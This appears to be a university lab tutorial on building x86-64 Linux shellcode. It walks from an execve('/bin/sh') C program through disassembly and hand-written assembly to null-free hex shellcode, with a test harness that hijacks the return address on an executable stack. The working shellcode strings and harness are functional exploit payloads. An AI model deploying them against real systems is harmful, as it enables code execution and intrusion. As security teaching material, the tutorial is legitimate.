Shellcode
Introduction
Shellcode is used in buffer overflow attacks. It is simply binary machine instructions in string format. In general, shellcode is difficult to create, but extremely easy to find. This tutorial explains how to create shellcode.
The ideas from this tutorial are taken from Aleph1's Smashing the stack for fun and profit. It has been rewritten to expand explanations and so that it works on modern systems (specifically 64-bit linux kernels).
While this kind of attack is not usually possible anymore on modern computers, it is still often possible on embedded systems and IoT devices.
Executing a shell
The first task is to build a C program that will execute a shell. It should be as simple as possible. Here is a very simple C program that does just that:
// shellcode.c
#include <unistd.h>
int main() {
char *array[2];
array[0] = "/bin/sh";
array[1] = NULL;
execve(array[0], array, NULL);
return 0;
}
Compile it and make sure that it works correctly. Note that it's compiled statically (-static
). This is important for some of the next steps.
gcc -static -oshellcode shellcode.c
It works just as expected. Now the program needs to be disassembled. In order to disassemble the execve
function, it needed to be compiled into the program. That is why the -static
flag was necessary previously. gdb
is used to disassemble the important functions.
root:~# gdb shellcode
(gdb) disass main
Dump of assembler code for function main:
0x0000000000401b8d <+0>: push %rbp
0x0000000000401b8e <+1>: mov %rsp,%rbp
0x0000000000401b91 <+4>: sub $0x10,%rsp
0x0000000000401b95 <+8>: lea 0x7b468(%rip),%rax # 0x47d004
0x0000000000401b9c <+15>: mov %rax,-0x10(%rbp)
0x0000000000401ba0 <+19>: movq $0x0,-0x8(%rbp)
0x0000000000401ba8 <+27>: mov -0x10(%rbp),%rax
0x0000000000401bac <+31>: lea -0x10(%rbp),%rcx
0x0000000000401bb0 <+35>: mov $0x0,%edx
0x0000000000401bb5 <+40>: mov %rcx,%rsi
0x0000000000401bb8 <+43>: mov %rax,%rdi
0x0000000000401bbb <+46>: callq 0x43c700 <execve>
0x0000000000401bc0 <+51>: mov $0x0,%eax
0x0000000000401bc5 <+56>: leaveq
0x0000000000401bc6 <+57>: retq
End of assembler dump.
(gdb) disass execve
Dump of assembler code for function execve:
0x000000000043c700 <+0>: mov $0x3b,%eax
0x000000000043c705 <+5>: syscall
0x000000000043c707 <+7>: cmp $0xfffffffffffff001,%rax
0x000000000043c70d <+13>: jae 0x43c710 <execve+16>
0x000000000043c70f <+15>: retq
0x000000000043c710 <+16>: mov $0xffffffffffffffc0,%rcx
0x000000000043c717 <+23>: neg %eax
0x000000000043c719 <+25>: mov %eax,%fs:(%rcx)
0x000000000043c71c <+28>: or $0xffffffffffffffff,%rax
0x000000000043c720 <+32>: retq
End of assembler dump.
(gdb) quit
What's actually going on here? The following table explains what different sets of instructions are doing.
https://filippo.io/linux-syscall-table/
Explanation | Instructions |
---|---|
Set up the main function |
push %rbp
mov %rsp,%rbp
sub $0x10,%rsp
|
Evaluate and move the address of the string /bin/sh onto the stack |
lea 0x7b468(%rip),%rax
mov %rax,-0x10(%rbp)
|
Zero the memory after the address of the string. This is required because the execve syscall needs a null-terminated array for its argv parameter. |
movq $0x0,-0x8(%rbp)
|
Move the address of the /bin/sh string into
rax |
mov -0x10(%rbp),%rax
|
Store the address of the address of /bin/sh in rcx (remember that the argv parameter consumes an array of pointers, so that is what this is) |
lea -0x10(%rbp),%rcx
|
Set edx to zero, since we don't use the third parameter of execve (null will disable it) |
mov $0x0,%edx
|
Rearrange the values to observe the calling convention of x86-64 Linux |
mov %rcx,%rsi
mov %rax,%rdi
|
The call to our static execve function |
callq 0x43c700 <execve>
|
Complete main and return 0 |
mov $0x0,%eax
leaveq
retq
|
With the knowledge of what is happening in main
, it's possible to figure out what's within the execve
function.
Explanation | Instructions |
---|---|
Set the syscall id for execve |
mov $0x3b,%eax
|
The arguments for the syscall were satisfied by the calling convention from main to execve being almost the same as for the syscall itself. Therefore, we can simply perform the sycall now. |
syscall
|
This part is irrelevant, because the above syscall never returns (execution of /bin/sh begins instead) |
cmp $0xfffffffffffff001,%rax
jae 0x43c710 <execve+16>
retq
mov $0xffffffffffffffc0,%rcx
neg %eax
mov %eax,%fs:(%rcx)
or $0xffffffffffffffff,%rax
retq
|
There are a lot of instructions here. Needless to say, not all of them are needed. The shorter the shellcode is, the more robust it is.
First, the following things must exist in memory:
-
The null terminated string,
/bin/sh
-
The address of the string followed by an eight-byte
NULL
(this isarray
) -
The address of
array
Then all that needs to be done is:
-
The address of
/bin/sh
put intordi
-
The address of
array
put intorsi
-
A
NULL
put intordx
-
0x3b
put intorax
-
syscall
instruction called
If the execve
call fails, though, the program should exit cleanly. To do this, a call to exit can be added to the end of the shellcode. It's not too much extra trouble.
Exiting a program is actually very simple. Simply pass an exit code using the calling convention and use syscall 0x3c. On Linux (and many other systems), an exit code of 0 indicates that a program completed without an error.
Compiling the assembly instructions
Now that the basics of what needs to be done have been figured out, it's time to put it all together. With /bin/sh
in memory, here's what needs to be done:
-
Put the address of
/bin/sh
inrdi
-
Ensure
/bin/sh
is null terminated with a'\0'
-
Put the address of
/bin/sh
inarray[0]
-
Put an eight-byte
NULL
inarray[1]
-
Put the address of the array into
rsi
-
Put a
NULL
intordx
-
Put
0x3b
inrax
-
Call
syscall
-
Store
0x0
inrdi
-
Store
0x3c
inrax
-
Call
syscall
This roughly translates to:
???? %rdi # get string into rdi
movb $0x0, string-end(%rdi) # null terminate string
movq %rdi, array-0-offset(%rdi) # store address of string
movq $0x0, array-1-offset(%rdi) # null terminate array
movq $0x0, %rdx # put a null in rdx
leaq array-0-offset(%rdi), %rsi # put array address in rsi
movq $0x3b, %rax # set syscall number for execve
syscall # do the syscall execve
movq $0x0, %rdi # set exit status of 0
movq $0x3c, %rax # set syscall number for exit
syscall # do the syscall exit
.string "/bin/sh"
This is all well and good, but the address of the /bin/sh
string isn't known. It could end up anywhere in the program, and there's no way of knowing. On x86-32, it was possible to leak addresses by using the call
instruction to push the address of the next instruction to the stack. This is not possible on x86-64. Fortunately, the 64 bit instruction set allows for a new, more direct way of obtaining addresses. You may be familiar with the instruction pointer, rip
, which indicates the address of the next instruction to be executed. While this is normally restricted register, we are actually allowed to use it as a base address in the lea
instruction.
lea (%rip), %rdi # (7) get the address of rip
addq inst-offset, %rdi # (4) add the offset to calculate the address of "/bin/sh"
movb $0x0, string-len(%rdi) # (4) null terminate string
movq %rdi, array-0-offset(%rdi) # (4) store address of string
movq $0x0, array-1-offset(%rdi) # (8) null terminate array
movq $0x0, %rdx # (7) put a null in rdx
leaq array-0-offset(%rdi), %rsi # (4) put array in rsi
movq $0x3b, %rax # (7) set syscall number for execve
syscall # (2) do the syscall execve
movq $0x0, %rdi # (7) set exit status of 0
movq $0x3c, %rax # (7) set syscall number for exit
syscall # (2) do the syscall exit
.string "/bin/sh"
The number of bytes for each instruction has been included in the above instructions.
This is pretty much the final assembly code, but the offsets need to be determined. To know what the offsets are, a memory location for the array has to be determined. Since the program won't be executing any other instructions, any memory location within the program's address space will work. A good place for it is just after the /bin/sh
string.
Indicating the 8 byte address of /bin/sh
with addr
and the 8 byte address of a NULL
with null
, the goal is to lay out the memory like this:
/bin/sh\0[addr][null]
-
STRING_LEN
is0x7
since the string is 7 characters long -
ARRAY_0_OFFSET
is0x8
to begin the array just after the null character in the string -
ARRAY_1_OFFSET
is0x10
, 8 bytes afterARRAY_0_OFFSET
For clarity, the (approximate) C equivalent of what's happening is this:
char string[16] = "/bin/sh";
char *null_terminator = string + STRING_LEN;
long *string_addr = string + ARRAY_0_OFFSET;
long *null_addr = string + ARRAY_1_OFFSET;
*null_terminator = '\0';
*string_addr = (long)string;
*null_addr = 0;
To resolve the instruction offset, count the number of bytes from the end of the lea
instruction until the beginning of /bin/sh
. It's 56, so the instruction becomes addq $56, %rdi
. We also add some things so that the program can assemble correctly. You may wonder why we have the instruction offset at all. In fact, it is only here to benefit the clarity of the example and make the code easier for us to modify by hand. You could add the instruction offset to the other constants, or you can add it to the lea instruction (however, this would break later) and the shellcode would still work. However, we will leave it in this example.
main:
lea (%rip), %rdi # (7) get the address of rip
addq $56, %rdi # (4) add the offset to calculate the address of "/bin/sh"
movb $0x0, 0x7(%rdi) # (4) null terminate string
movq %rdi, 0x8(%rdi) # (4) store address of string
movq $0x0, 0x10(%rdi) # (8) null terminate array
movq $0x0, %rdx # (7) put a null in rdx
leaq 0x8(%rdi), %rsi # (4) put array in rsi
movq $0x3b, %rax # (7) set syscall number for execve
syscall # (2) do the syscall execve
movq $0x0, %rdi # (7) set exit status of 0
movq $0x3c, %rax # (7) set syscall number for exit
syscall # (2) do the syscall exit
.string "/bin/sh"
.globl main
This is pretty easy to compile with gdb
. Just put it in a file with a .s
extension, and gdb
knows that it's assembly instructions. The added symbols above define a main function so the program compiles properly.
root:~# gcc -g -o shellcode shellcode.s
Disassembling the program in gdb
will ensure gcc
didn't change anything.
root:~# gdb shellcode
(gdb) disass main
Dump of assembler code for function main:
0x0000000000001125 <+0>: lea 0x0(%rip),%rdi # 0x112c <main+7>
0x000000000000112c <+7>: add $0x38,%rdi
0x0000000000001130 <+11>: movb $0x0,0x7(%rdi)
0x0000000000001134 <+15>: mov %rdi,0x8(%rdi)
0x0000000000001138 <+19>: movq $0x0,0x10(%rdi)
0x0000000000001140 <+27>: mov $0x0,%rdx
0x0000000000001147 <+34>: lea 0x8(%rdi),%rsi
0x000000000000114b <+38>: mov $0x3b,%rax
0x0000000000001152 <+45>: syscall
0x0000000000001154 <+47>: mov $0x0,%rdi
0x000000000000115b <+54>: mov $0x3c,%rax
0x0000000000001162 <+61>: syscall
0x0000000000001164 <+63>: (bad)
0x0000000000001165 <+64>: (bad)
0x0000000000001166 <+65>: imul $0xf006873,0x2f(%rsi),%ebp
0x000000000000116d <+72>: (bad)
0x000000000000116e <+73>: add %al,0x57(%rcx)
It looks fine, but if you try to run this program, it will segfault. The reason is because the program modifies itself. When compiled this way, the instructions (as well as the string) are in the text/code section of the program. Modern kernels mark this section as read-only. When the program tries to write null byte at the end of /bin/sh
, it crashes.
That's okay because when used, this will be executing in the stack. To quickly prepare this for the stack, objdump
will output the binary for the instructions.
root:~# objdump -d shellcode | grep -A20 '<main>:'
0000000000001125 <main>:
1125: 48 8d 3d 00 00 00 00 lea 0x0(%rip),%rdi # 112c <main+0x7>
112c: 48 83 c7 38 add $0x38,%rdi
1130: c6 47 07 00 movb $0x0,0x7(%rdi)
1134: 48 89 7f 08 mov %rdi,0x8(%rdi)
1138: 48 c7 47 10 00 00 00 movq $0x0,0x10(%rdi)
113f: 00
1140: 48 c7 c2 00 00 00 00 mov $0x0,%rdx
1147: 48 8d 77 08 lea 0x8(%rdi),%rsi
114b: 48 c7 c0 3b 00 00 00 mov $0x3b,%rax
1152: 0f 05 syscall
1154: 48 c7 c7 00 00 00 00 mov $0x0,%rdi
115b: 48 c7 c0 3c 00 00 00 mov $0x3c,%rax
1162: 0f 05 syscall
1164: 2f (bad)
1165: 62 (bad)
1166: 69 6e 2f 73 68 00 0f imul $0xf006873,0x2f(%rsi),%ebp
116d: 1f (bad)
116e: 40 rex
Everything up through the final syscall instruction are normal instructions. The information after it is the string /bin/sh
, which can be replaced with the actual string /bin/sh
. The shellcode can be tested in a simple program.
char shellcode[] =
"\x48\x8d\x3d\x00\x00\x00\x00\x48\x83\xc7\x38\xc6\x47\x07\x00\x48\x89\x7f\x08\x48\xc7\x47\x10\x00\x00\x00\x00\x48\xc7\xc2\x00\x00\x00\x00\x48\x8d\x77\x08\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05\x48\xc7\xc7\x00\x00\x00\x00\x48\xc7\xc0\x3c\x00\x00\x00\x0f\x05/bin/sh";
void shell() {
long* ret;
ret = (long*)&ret + 2;
(*ret) = (long)shellcode;
}
int main() {
shell();
return 0;
}
Now just compile (allowing the stack to be executable) and run:
root:~# gcc -g -z execstack -fno-stack-protector -o shellcode shellcode.c
root:~# ./shellcode
# exit
root:~#
It works properly. You should run this executable in gdb and step through each line of assembly to confirm your understanding of what is happening.
Removing null characters
Many buffer overflows exploits rely on functions that read strings until reaching a null character. If there are any null characters in shellcode, then the function will stop reading at the first one, and all of the shellcode will not make its way into the program. It's actually pretty simple to replace instructions that contain null characters. The following table includes instructions that cause problems and their replacements.
Problem | Replacement |
---|---|
leaq 0x0(%rip),%rdi
|
leaq -0x1(%rip),%rdi
Add one to the instruction offset counter to compensate for this
|
movb $0x0, 0x7(%rdi)
movq $0x0, 0x10(%rdi)
movq $0x0, %rdx
|
xorq %rax, %rax
movb %al, 0x7(%rdi)
movq %rax, 0x10(%rdi)
movq %rax, %rdx
|
movq $0x3b, %rax
movq $0x3c, %rax
|
xorq %rax, %rax
addb 0x3b, %al (or 0x3c)
|
movq $0x0, %rdi
|
xorq %rdi, %rdi
|
The assembly instructions now become:
main:
leaq -0x1(%rip), %rdi
addq $0x28, %rdi
xorq %rax, %rax
movb %al, 0x7(%rdi)
movq %rdi, 0x8(%rdi)
movq %rax, 0x10(%rdi)
movq %rax, %rdx
leaq 0x8(%rdi), %rsi
addb $0x3b, %al
syscall
xorq %rdi, %rdi
xorq %rax, %rax
addb $0x3c, %al
syscall
.string "/bin/sh"
.globl main
Note that the jump offset has changed since instructions were modified. Assembling this, and using objdump
results in the following:
root:~# gcc -g -o shellcode shellcode.s
root:~# objdump -d shellcode | grep -A20 '<main>:'
0000000000001125 <main>:
1125: 48 8d 3d ff ff ff ff lea -0x1(%rip),%rdi # 112b <main+0x6>
112c: 48 83 c7 28 add $0x28,%rdi
1130: 48 31 c0 xor %rax,%rax
1133: 88 47 07 mov %al,0x7(%rdi)
1136: 48 89 7f 08 mov %rdi,0x8(%rdi)
113a: 48 89 47 10 mov %rax,0x10(%rdi)
113e: 48 89 c2 mov %rax,%rdx
1141: 48 8d 77 08 lea 0x8(%rdi),%rsi
1145: 04 3b add $0x3b,%al
1147: 0f 05 syscall
1149: 48 31 ff xor %rdi,%rdi
114c: 48 31 c0 xor %rax,%rax
114f: 04 3c add $0x3c,%al
1151: 0f 05 syscall
1153: 2f (bad)
1154: 62 (bad)
1155: 69 6e 2f 73 68 00 0f imul $0xf006873,0x2f(%rsi),%ebp
As expected, all of the nulls have been removed (except for the garbage after our string), so we can update our shellcode:
char shellcode[] =
"\x48\x8d\x3d\xff\xff\xff\xff\x48\x83\xc7\x28\x48\x31\xc0\x88\x47\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x89\xc2\x48\x8d\x77\x08\x04\x3b\x0f\x05\x48\x31\xff\x48\x31\xc0\x04\x3c\x0f\x05/bin/sh";
Compiling it and running it in the previous shellcode.c
program shows that the shellcode works, and now it has no null characters.
root:~# gcc -g -z execstack -fno-stack-protector -o shellcode shellcode.c
root:~# ./shellcode
$ exit
root:~#
Using the shellcode
Shellcode is used in buffer overflow attacks. To learn more about how to use the shellcode, read about buffer overflows.
Classwork
For submission, run some commands after you get the shell from executing the program and take a screenshot.
NOTE: You may find that this lab is very easy to complete by copying the steps shown above. While that is sufficient to get credit right now, you will find that you won't have learned the skills required to do subsequent assignments effectively. Unless you have an unusual schedule, it is better for you to spend the time required to understand this concept now rather than later.
As a challenge to test your understanding, try modifying this shellcode to work without null terminating the string dynamically, and instead use the null terminator implicitly provided by C (optional).
Copyright 2020 the following:
Aaron Nelson
Nate Tracy-Amoroso
Copyright 2008 the following:
Sam McIngvale sam.mcingvale@u.northwestern.edu
Jim Spadaro j-spadaro@northwestern.edu
Whitney Young wbyoung@u.northwestern.edu
All rights reserved. Permission to reproduce this document in whole or in part must be obtained from the authors.